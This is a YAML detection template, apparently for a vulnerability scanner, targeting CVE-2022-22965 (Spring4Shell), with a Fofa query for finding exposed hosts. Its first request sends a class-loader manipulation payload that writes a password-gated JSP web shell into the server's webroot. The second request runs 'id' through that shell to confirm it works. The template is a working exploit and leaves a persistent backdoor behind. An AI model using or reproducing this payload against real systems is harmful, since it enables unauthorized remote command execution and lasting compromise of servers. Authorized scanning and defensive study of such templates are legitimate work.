id: CVE-2022-22965

info:
  name: Spring Framework RCE JDK 9+
  author: zan8in
  severity: critical
  description: |
    srping framework 结合JDK9及以上新版本的特性可以实现对历史漏洞补丁的绕过从而实现远程代码执行
    Fofa: app="vmware-SpringBoot-Framework"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22965
    - https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-Core-Rce/blob/main/main.go


set:
  filename: randomLowercase(20)
rules:
  r0:
    request:
      method: POST
      path: /
      headers:
        suffix: "%>//"
        c1: "Runtime"
        c2: "<%"
        DNT: "1"
      body: |
        class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix={{filename}}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /{{filename}}.jsp?pwd=j&cmd=id
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()